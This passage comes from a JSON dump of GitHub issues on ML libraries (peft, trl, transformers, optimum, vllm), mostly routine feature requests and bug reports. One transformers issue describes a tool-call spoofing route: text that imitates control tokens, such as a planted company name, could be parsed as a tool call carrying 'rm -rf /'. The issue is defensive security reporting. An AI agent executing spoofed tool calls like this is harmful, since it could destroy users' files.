"### Feature request\n\nTL;DR: `from peft import get_base_model_state_dict`\n\nHi!\n\nI'm looking for a way to get the state dict of the base model after it has been wrapped in a `PeftModel` while preserving the original model's state dict keys. To the best of my knowledge, the only way this can be done right now is getting the state dict from `peft_model.base_model.model` and manually patching the keys by removing the `.base_layer.` infix and filtering our peft param keys.\n\nA reason you wouldn't want to load the base model's state dict before wrapping it, for example, is when you are loading state dicts after FSDP wrapping your peft model.\n\n### Your contribution\n\nI have some of this logic implemented for Torchtitan. I could repurpose some of it for a PR that handles PEFT's edge-cases a bit more gracefully (so far I've only checked my approach for LoRA).", "url": "https://github.com/huggingface/peft/issues/2945", "state": "open", "labels": [], "created_at": "2025-12-09T11:23:52Z", "updated_at": "2025-12-09T17:06:13Z", "comments": 6, "user": "dvmazur" }, { "repo": "vllm-project/vllm", "number": 30325, "title": "[Performance]: Can we enable triton_kernels on sm120", "body": "### Proposal to improve performance\n\nSince PR (https://github.com/triton-lang/triton/pull/8498) had been merged, we may enable triton_kernels on sm120. \nhttps://github.com/vllm-project/vllm/blob/67475a6e81abea915857f82e6f10d80b03b842c9/vllm/model_executor/layers/quantization/mxfp4.py#L153-L160\n\nAlthough I haven't looked at the relevant code in detail yet, I think it should be sufficient to complete the unit tests(or vllm had already had, just skip on sm120, delete one line is enough) for all the kernels involved when triton_kernels is enabled and run them on sm120.\n\n@zyongye Does this idea make sense?\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30325", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-09T09:21:04Z", "updated_at": "2025-12-10T10:16:18Z", "comments": 2, "user": "ijpq" }, { "repo": "vllm-project/vllm", "number": 30296, "title": "[Usage]: Is it possible to configure P2P kv-cache in multi-machine and multi-gpu scenarios?", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-126-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA L20\nGPU 1: NVIDIA L20\nGPU 2: NVIDIA L20\nGPU 3: NVIDIA L20\nGPU 4: NVIDIA L20\nGPU 5: NVIDIA L20\nGPU 6: NVIDIA L20\nGPU 7: NVIDIA L20\n\nNvidia driver version : 550.90.07\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==2.2.0\n[pip3] nvidia-cublas-cu12==12.9.1.4\n[pip3] nvidia-cuda-cupti-cu12==12.9.79\n[pip3] nvidia-cuda-nvrtc-cu12==12.9.86\n[pip3] nvidia-cuda-runtime-cu12==12.9.79\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.4.1.4\n[pip3] nvidia-cufile-cu12==1.14.1.1\n[pip3] nvidia-curand-cu12==10.3.10.19\n[pip3] nvidia-cusolver-cu12==11.7.5.82\n[pip3] nvidia-cusparse-cu12==12.5.10.65\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.2.1\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.5\n[pip3] nvidia-nvjitlink-cu12==12.9.86\n[pip3] nvidia-nvshmem-cu12==3.3.20\n[pip3] nvidia-nvtx-cu12==12.9.79\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.9.0+cu129\n[pip3] torchaudio==2.9.0+cu129\n[pip3] torchvision==0.24.0+cu129\n[pip3] transformers==4.57.1\n[pip3] triton==3.5.0\n[conda] Could not collect\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.2\nvLLM Build Flags:\n CUDA Archs: Not Set; ROCm: Disabled\nGPU Topology:\n GPU0 GPU1 GPU2 GPU3 GPU4 GPU5 GPU6 GPU7 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X PIX PIX PIX SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU1 PIX X PIX PIX SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU2 PIX PIX X PIX SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU3 PIX PIX PIX X SYS SYS SYS SYS 0-55,112-167 0 N/A\nGPU4 SYS SYS SYS SYS X PIX PIX PIX 56-111,168-223 1 N/A\nGPU5 SYS SYS SYS SYS PIX X PIX PIX 56-111,168-223 1 N/A\nGPU6 SYS SYS SYS SYS PIX PIX X PIX 56-111,168-223 1 N/A\nGPU7 SYS SYS SYS SYS PIX PIX PIX X 56-111,168-223 1 N/A\n\n\n==============================\n Environment Variables\n==============================\nNVIDIA_VISIBLE_DEVICES=all\nNVIDIA_REQUIRE_CUDA=cuda>=12.9 brand=unknown,driver>=535,driver<536 brand=grid,driver>=535,driver<536 brand=tesla,driver>=535,driver<536 brand=nvidia,driver>=535,driver<536 brand=quadro,driver>=535,driver<536 brand=quadrortx,driver>=535,driver<536 brand=nvidiartx,driver>=535,driver<536 brand=vapps,driver>=535,driver<536 brand=vpc,driver>=535,driver<536 brand=vcs,driver>=535,driver<536 brand=vws,driver>=535,driver<536 brand=cloudgaming,driver>=535,driver<536 brand=unknown,driver>=550,driver<551 brand=grid,driver>=550,driver<551 brand=tesla,driver>=550,driver<551 brand=nvidia,driver>=550,driver<551 brand=quadro,driver>=550,driver<551 brand=quadrortx,driver>=550,driver<551 brand=nvidiartx,driver>=550,driver<551 brand=vapps,driver>=550,driver<551 brand=vpc,driver>=550,driver<551 brand=vcs,driver>=550,driver<551 brand=vws,driver>=550,driver<551 brand=cloudgaming,driver>=550,driver<551 brand=unknown,driver>=560,driver<561 brand=grid,driver>=560,driver<561 brand=tesla,driver>=560,driver<561 brand=nvidia,driver>=560,driver<561 brand=quadro,driver>=560,driver<561 brand=quadrortx,driver>=560,driver<561 brand=nvidiartx,driver>=560,driver<561 brand=vapps,driver>=560,driver<561 brand=vpc,driver>=560,driver<561 brand=vcs,driver>=560,driver<561 brand=vws,driver>=560,driver<561 brand=cloudgaming,driver>=560,driver<561 brand=unknown,driver>=", "url": "https://github.com/vllm-project/vllm/issues/30296", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-09T03:29:48Z", "updated_at": "2025-12-09T03:29:48Z", "comments": 0, "user": "lululu-1997" }, { "repo": "huggingface/trl", "number": 4641, "title": "Further improving `GRPOTrainer` doc to include Qwen SAPO in Loss Types", "body": "### Feature request\n\nHello,\n\nI'd like to further document the Qwen SAPO implementation from @pramodith , not in the `paper_index` (he already did a good job) but in the `loss-types` subsection of the `GRPOTrainer`: https://huggingface.co/docs/trl/main/en/grpo_trainer#loss-types.\n\nI'd like to add the formula, a short paragraph description similar to other losses presented, and maybe the figure below I made, inspired by the SAPO paper Fig.1, that highlights visually the differences in trust regions with other `loss_type` options available for GRPO (at least GRPO, DAPO and DR GRPO), which is the core difference.\n\n\"Image\"\n\n*Note:* *negative temp* $\\tau=1.5$ *is not a typo, it's to see the difference more clearly with positive temp (as the delta with 1.05 is too small)*\n\n### Motivation\n\nCompared to the available losses in the repo, I believe Qwen's SAPO difference is more pronounced. It's not just a matter on how to average like DAPO. Changing the PPO clip that almost everyone use is worth, imo, being mentioned in the `loss-types` subsection.\n\nSince there may be people not necessarily familiar with some RL details using TRL, I thought covering SAPO could help people better grasp or visualize the difference in the trust region and gradient weights.\n\n### Your contribution\n\nI'd like to submit a PR if you think this is something useful for readers/users.", "url": "https://github.com/huggingface/trl/issues/4641", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb GRPO" ], "created_at": "2025-12-08T20:06:59Z", "updated_at": "2025-12-12T17:28:06Z", "comments": 1, "user": "casinca" }, { "repo": "huggingface/transformers", "number": 42713, "title": "mulitmodal forward pass for ministral 3 family", "body": "### System Info\n\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/models/ministral3/modeling_ministral3.py#L505\n\nseems like here we are using generic class which takes only the input ids as input ignoring the pixel values. when can we expect this implemented ?\n\n\n\n### Who can help?\n\n@Cyrilvallez \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nplease implement https://github.com/huggingface/transformers/blob/main/src/transformers/models/gemma3/modeling_gemma3.py#L1174 for ministral family as well with multimodal capabilities\n\n### Expected behavior\n\nneed multimodal capabilities using ministral for finetuning ministral for sequence classification like gemma 3 4b\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/models/gemma3/modeling_gemma3.py#L1174", "url": "https://github.com/huggingface/transformers/issues/42713", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-08T18:46:14Z", "updated_at": "2025-12-15T11:21:08Z", "comments": 4, "user": "rishavranaut" }, { "repo": "vllm-project/vllm", "number": 30271, "title": "[Usage]: Qwen 3 VL Embedding", "body": "### Your current environment\n\nHi I would like to ask if there is a way to extract Qwen 3 VL multimodal embeddings, similar to Jina Embeddings V4, for retrieval purposes?\n\nI've tried to initialize the model this way but it doesn't work:\n```\nmodel = LLM(\n model=\"Qwen/Qwen3-VL-8B-Instruct\",\n task=\"embed\",\n trust_remote_code=True,\n)\n```\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30271", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-08T17:26:41Z", "updated_at": "2025-12-09T07:18:35Z", "comments": 2, "user": "MingFengC" }, { "repo": "huggingface/optimum", "number": 2390, "title": "Request for input shapes to be specified", "body": "### Feature request\n\nCurrently, \noptimum-cli does not provide a way to specify static input shapes, it defaults to dynamic shapes. Is there a way to make it possible to specify the input shape? If not, why do we not allow this?\n\nAn example would be:\n`optimum-cli export openvino --model microsoft/resnet-50 graph_convert` -> ` optimum-cli export openvino --model microsoft/resnet-50 graph_convert --input [1, 3, 224, 224]`\n\n### Motivation\n\nSpecifying a static shape in OpenVINO IR is nice to have for the [Intel/Altera FPGA AI Suite](https://www.altera.com/products/development-tools/fpga-ai-suite) toolchain which does not support dynamic input shapes of OpenVINO IR at the moment\n\n### Your contribution\n\nYes if possible or the green light is given that this is allowed.\nSome modifications to the optimum_cli.py file [here](https://github.com/huggingface/optimum/blob/0227a1ce9652b1b02da5a510bf513c585608f8c2/optimum/commands/optimum_cli.py#L179)\nwould probably be needed ", "url": "https://github.com/huggingface/optimum/issues/2390", "state": "open", "labels": [], "created_at": "2025-12-08T15:24:04Z", "updated_at": "2025-12-20T19:38:02Z", "comments": 3, "user": "danielliuce" }, { "repo": "huggingface/transformers", "number": 42698, "title": "parse_response must not accept detokenized text", "body": "### System Info\n\n[parse_response](https://github.com/huggingface/transformers/blob/5ee9ffe386c5ecc77d8009ab648b8c4c109931ea/src/transformers/tokenization_utils_base.py#L3525) function must only accept raw tokens, but never detokenized text. Parsing from text is a vulnerability and therefore must not be possible.\n\nOnce model response is rendered to text it is not possible to distinguish control tokens from their textual representations. At the very least this leads to inconvenience due to inability to discuss with the model its own codebase: \"here is my code, what is the function calling format used by the model?\" In worst case it can be used as a part of the attack vector e.g. registering a company to pop up in search result with an `rm -rf .` name with a hope that the name will be returned by the model as-is. (E.g. in the UK there used to be [\"; DROP TABLE \"COMPANIES\";--LTD\"](https://find-and-update.company-information.service.gov.uk/company/10542519))\n\nAlso accepting a text string facilitates relying on models only producing text and when we get multimodal models, we end up with no infrastructure for them as everythong is reduced to text.\n\nIt is important to design APIs in such a way that they are hard to be used incorrectly. Passing text to `parse_response` is appealing and kind of the easiest way to use the API.\n\nI am publishing this as an open bug rather than closed security issue because it is a widespread systematic problem that haunts many implementations. It is worth discussing it openly.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nIf a model produces following token sequences:\n\n`[\"\", \"rm -rf /\", \"\"]` \n`[\"<\", \"tool \", \"call \", \"start\", \">\", \"rm -rf /\", \"<\", \"tool \", \"call \", \"end\", \">\"]` \n\nThey both are detokenized to the same \"rm -rf .\". The [parse_response](https://github.com/huggingface/transformers/blob/5ee9ffe386c5ecc77d8009ab648b8c4c109931ea/src/transformers/tokenization_utils_base.py#L3525) function has to return the same output for both of them.\n\n### Expected behavior\n\n[parse_response](https://github.com/huggingface/transformers/blob/5ee9ffe386c5ecc77d8009ab648b8c4c109931ea/src/transformers/tokenization_utils_base.py#L3525) must return tool call for `[\"\", \"rm -rf /\", \"\"]` but a plain text for `[\"<\", \"tool \", \"call \", \"start\", \">\", \"rm -rf /\", \"<\", \"tool \", \"call \", \"end\", \">\"]` .", "url": "https://github.com/huggingface/transformers/issues/42698", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-08T12:20:39Z", "updated_at": "2025-12-08T15:59:19Z", "comments": 2, "user": "kibergus" }, { "repo": "vllm-project/vllm", "number": 30248, "title": "[Feature]: any plan to support Relaxed Acceptance in v1?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n[NV Relaxed Acceptance](https://github.com/NVIDIA/TensorRT-LLM/blob/main/docs/source/blogs/tech_blog/blog2_DeepSeek_R1_MTP_Implementation_and_Optimization.md#relaxed-acceptance)\nThere are PRs ([vllm](https://github.com/vllm-project/vllm/pull/21506), [vllm](https://github.com/vllm-project/vllm/pull/22238), [sglang](https://github.com/sgl-project/sglang/pull/7702), [sglang](https://github.com/sgl-project/sglang/pull/8068)) in both sglang and vllm. However, none of them has been merged. What's the story behind this?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30248", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-08T08:45:20Z", "updated_at": "2025-12-09T10:18:22Z", "comments": 4, "user": "chengda-wu" }, { "repo": "vllm-project/vllm", "number": 30246, "title": "[Usage]: How to disable reasoning for gpt-oss-120b", "body": "### Your current environment\n\n```\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.11.13 (main, Jun 5 2025, 13:12:00) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-160-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA L20\nGPU 1: NVIDIA L20\nGPU 2: NVIDIA L20\nGPU 3: NVIDIA L20\nGPU 4: NVIDIA L20\nGPU 5: NVIDIA L20\nGPU 6: NVIDIA L20\nGPU 7: NVIDIA L20\n\nNvidia driver version : 535.274.02\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 96\nOn-line CPU(s) list: 0-95\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 5418Y\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 24\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 2.3 MiB (48 instances)\nL1i cache: 1.5 MiB (48 instances)\nL2 cache: 96 MiB (48 instances)\nL3 cache: 90 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-23,48-71\nNUMA node1 CPU(s): 24-47,72-95\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; PBRSB-", "url": "https://github.com/vllm-project/vllm/issues/30246", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-08T08:23:58Z", "updated_at": "2025-12-08T08:23:58Z", "comments": 0, "user": "WiiliamC" }, { "repo": "huggingface/transformers", "number": 42690, "title": "How to run Phi4MultimodalProcessor", "body": "### System Info\n\ntransformers version: 4.57.1\npython version: 3.9\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n[Phi4MultiModal example](https://huggingface.co/docs/transformers/model_doc/phi4_multimodal)\n\n### Expected behavior\n\nI just run [the example](https://huggingface.co/docs/transformers/model_doc/phi4_multimodal) but there is an error raised.", "url": "https://github.com/huggingface/transformers/issues/42690", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-08T03:27:02Z", "updated_at": "2025-12-09T12:30:27Z", "user": "wcrzlh" }, { "repo": "vllm-project/vllm", "number": 30222, "title": "[Bug]: gpt-oss response api: streaming + code interpreter has bugs", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nGpt-oss in streaming mode cannot see internal code interpreter output \n\nthe problem is with https://github.com/vllm-project/vllm/blob/af0444bf40b7db2f3fb9fe1508d25ceba24cac87/vllm/entrypoints/context.py#L720-L732\n\nI can see that tool call result is not appended to message.\n\n\nMy basic testing code looks like this\n```python\nstream = client.responses.create(\n model=\"vllm-model\",\n input=[{\"role\": \"user\", \"content\": \"what is 123^456 mod 1000000007? use python tool to solve this problem\"}],\n tools=[{\"type\": \"code_interpreter\", \"container\": {\"type\": \"auto\"}}],\n max_output_tokens=32768,\n temperature=1.0,\n reasoning={\"effort\": \"high\"},\n stream=True,\n instructions=system_prompt,\n extra_body={\n \"min_p\": 0.02,\n \"stop_token_ids\": stop_token_ids,\n \"chat_template_kwargs\": {\"enable_thinking\": True},\n }\n)\n\ncurrent_tool_code = \"\"\n\nfor event in stream:\n generation_idx += 1\n\n # Reasoning text\n if event.type == \"response.reasoning_text.delta\":\n delta = event.delta\n reasoning_response += delta\n text_response += delta\n print(delta, end=\"\", flush=True) # Real-time output\n\n # Message text\n elif event.type == \"response.output_text.delta\":\n delta = event.delta\n text_response += delta\n print(delta, end=\"\", flush=True)\n\n # Tool call events\n elif event.type == \"response.code_interpreter_call_code.delta\":\n current_tool_code += event.delta\n\n elif event.type == \"response.code_interpreter_call_code.done\":\n tool_calls_log.append({\n \"code\": event.code,\n \"type\": \"code_interpreter\"\n })\n current_tool_code = \"\"\n print(event.code)\n\n elif event.type == \"response.completed\":\n # Final event - could extract full response here if needed\n pass\n```\n\n\nmodel response (ignore the pretty looking, it is just another version for visualization)\n```bash\n============================================================\n\n\n\ud83d\udcad REASONING:\nWe need to compute 123^456 mod 1000000007. It's a big power but within modular exponent. We can compute quickly with pow in Python: pow(123, 456, 1000000007). But the prompt says please use python tool to solve this problem. We'll use python.\n\ud83d\udcdd CODE EXECUTED:\npow(123, 456, 1000000007)\n\n------------------------------------------------------------\n\n\n\ud83d\udcad REASONING:\nLet's see result.\n\n\ud83d\udcad REASONING:\nIt printed something? Wait, no output visible yet. We may need to capture the output. Let's assign.\n\ud83d\udcdd CODE EXECUTED:\nresult = pow(123, 456, 1000000007)\nresult\n\n------------------------------------------------------------\n\n\n\ud83d\udcad REASONING:\nIt returned something? Let's see.\n\n\ud83d\udcad REASONING:\nIt didn't print, but the value is stored. We should print the result.\n\ud83d\udcdd CODE EXECUTED:\nprint(result)\n\n------------------------------------------------------------\n\n\n\ud83d\udcad REASONING:\n565291922\nSo answer is 565291922. Provide box.\n\n\ud83d\udcc4 FINAL ANSWER:\nThe value of \\(123^{456} \\bmod 1000000007\\) is \n\\[\n\\boxed{565291922}\n\\]\n============================================================\n\u2705 RESPONSE COMPLETED\nTool output tokens: 82\n\n============================================================\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30222", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-08T01:32:35Z", "updated_at": "2025-12-08T09:49:55Z", "comments": 4, "user": "jordane95" }, { "repo": "vllm-project/vllm", "number": 30211, "title": "[Bug]: How to make vLLM support multi stream torch compile and each stream capture cuda graph.", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nSGLang now supports multi stream torch compile and each stream capture cuda graph. The code link is \n\nhttps://github.com/sgl-project/sglang/blob/main/python/sglang/srt/model_executor/cuda_graph_runner.py#L500-#L506\n\nIf I want to make vLLM support that. My code on vLLM bypass the vLLM backend and make it like sglang\n\n```\nimport torch._dynamo.config\nimport torch._inductor.config\n\ntorch._inductor.config.coordinate_descent_tuning = True\ntorch._inductor.config.triton.unique_kernel_names = True\ntorch._inductor.config.freezing = True \ntorch._inductor.config.fx_graph_cache = False # Experimental feature to reduce compilation times, will be on by default in future\n\nfrom vllm.model_executor.custom_op import CustomOp\n\ndef _to_torch(model: torch.nn.Module, reverse: bool, num_tokens: int):\n for sub in model._modules.values():\n # sub.enter_torch_compile(num_tokens=num_tokens)\n # if isinstance(sub, torch.nn.Module):\n # _to_torch(sub, reverse, num_tokens)\n if isinstance(sub, CustomOp):\n if reverse:\n sub.leave_torch_compile()\n else:\n sub.enter_torch_compile(num_tokens=num_tokens)\n if isinstance(sub, torch.nn.Module):\n _to_torch(sub, reverse, num_tokens)\n\n\n@contextmanager\ndef patch_model(\n model: torch.nn.Module,\n enable_compile: bool,\n num_tokens: int,\n # tp_group: GroupCoordinator,\n):\n \"\"\"Patch the model to make it compatible with with torch.compile\"\"\"\n backup_ca_comm = None\n current_stream = torch.cuda.current_stream()\n with torch.cuda.stream(current_stream):\n print(f\"patch_model, the current_stream:{current_stream.cuda_stream}\", flush = True)\n try:\n if enable_compile:\n _to_torch(model, reverse=False, num_tokens=num_tokens)\n # backup_ca_comm = tp_group.ca_comm\n # Use custom-allreduce here.\n # We found the custom allreduce is much faster than the built-in allreduce in torch,\n # even with ENABLE_INTRA_NODE_COMM=1.\n # tp_group.ca_comm = None\n wrapped_forward = model.forward # \ud83d\udd25 \u53ea\u6539\u8fd9\u91cc\n with torch.no_grad():\n compiled = torch.compile(wrapped_forward, mode=\"max-autotune-no-cudagraphs\", dynamic=False)\n yield compiled \n # yield torch.compile(\n # model.forward,\n # mode=\"max-autotune-no-cudagraphs\",\n # dynamic=False,)\n # yield torch.compile(\n # torch.no_grad()(model.forward),\n # mode=\"reduce-overhead\",\n # dynamic=_is_hip and get_bool_env_var(\"SGLANG_TORCH_DYNAMIC_SHAPE\"),\n # )\n else:\n yield model.forward\n finally:\n if enable_compile:\n _to_torch(model, reverse=True, num_tokens=num_tokens)\n\n\n \n @torch.inference_mode()\n def _my_dummy_run(\n self,\n num_tokens: int,\n run_decode_phase:bool=False,\n stream_idx: int = 0,\n ) -> torch.Tensor:\n # Set num_scheduled_tokens based on num_tokens and max_num_seqs\n # for dummy run with LoRA so that the num_reqs collectively\n # has num_tokens in total.\n with torch.cuda.stream(torch.cuda.current_stream()):\n assert num_tokens <= self.scheduler_config.max_num_batched_tokens\n max_num_reqs = self.scheduler_config.max_num_seqs\n num_reqs = max_num_reqs if num_tokens >= max_num_reqs else num_tokens\n min_tokens_per_req = num_tokens // num_reqs\n num_scheduled_tokens_list = [min_tokens_per_req] * num_reqs\n num_scheduled_tokens_list[-1] += num_tokens % num_reqs\n assert sum(num_scheduled_tokens_list) == num_tokens\n assert len(num_scheduled_tokens_list) == num_reqs\n num_scheduled_tokens = np.array(num_scheduled_tokens_list,\n dtype=np.int32)\n\n with self.maybe_dummy_run_with_lora(self.lora_config,\n num_scheduled_tokens):\n model = self.model\n if self.is_multimodal_model:\n input_ids = None\n inputs_embeds = self.inputs_embeds[:num_tokens]\n else:\n input_ids = self.input_ids[:num_tokens]\n inputs_embeds = None\n if self.uses_mrope:\n positions = self.mrope_positions[:, :num_tokens]\n else:\n positions = self.positions[:num_tokens]\n\n if get_pp_group().is_first_rank:\n intermediate_tensors = None\n else:\n ", "url": "https://github.com/vllm-project/vllm/issues/30211", "state": "open", "labels": [ "bug", "feature request", "nvidia" ], "created_at": "2025-12-07T15:12:04Z", "updated_at": "2025-12-15T05:39:39Z", "comments": 3, "user": "lambda7xx" }, { "repo": "vllm-project/vllm", "number": 30193, "title": "[Bug]: Behavioral Difference in hidden_states[-1] between vLLM and Transformers for Qwen3VLForConditionalGeneration", "body": "### Your current environment\n- vLLM Version: 0.11.2\n- Transformers Version: 4.57\n- Model: Qwen3VLForConditionalGeneration\n\n### \ud83d\udc1b Describe the bug\nI have observed an inconsistency in the output of the forward method for the `Qwen3VLForConditionalGeneration` class between vLLM (version 0.11.2) and Transformers (version 4.57).\n\nIn the Transformers library, the last hidden state (`outputs.hidden_states[0, -1, :]`) returned is before the final layer normalization. However, in vLLM, the returned hidden_states appears to be after the normalization is applied.\n\nIs this discrepancy an unintended bug, or is there a configuration option in vLLM to control this output behavior (e.g., to return the pre-norm hidden states)?\n\nI don't have minimal demo, but I change the origin code to test.\n\nBecause the`forward` method of `Qwen3VLForConditionalGeneration` has the following code:\n```python\n hidden_states = self.language_model.model(\n input_ids=input_ids,\n positions=positions,\n intermediate_tensors=intermediate_tensors,\n inputs_embeds=inputs_embeds,\n # args for deepstack\n deepstack_input_embeds=deepstack_input_embeds,\n )\n```\nThe type of `self.language_model.model` is `Qwen3LLMModel`.\n\nI introduced an environment variable:`LAST_HIDDEN_STATE_NOT_NORM` before return of `Qwen3LLMModel` 's `forward` method:\n```python\n if os.environ.get(\"LAST_HIDDEN_STATE_NOT_NORM\", \"0\") == \"1\":\n return hidden_states + residual\n\n if not 